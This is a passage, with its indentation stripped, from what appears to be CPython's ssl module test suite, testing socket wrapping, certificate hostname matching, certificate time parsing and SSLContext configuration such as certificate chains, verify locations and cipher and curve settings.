# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatement for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
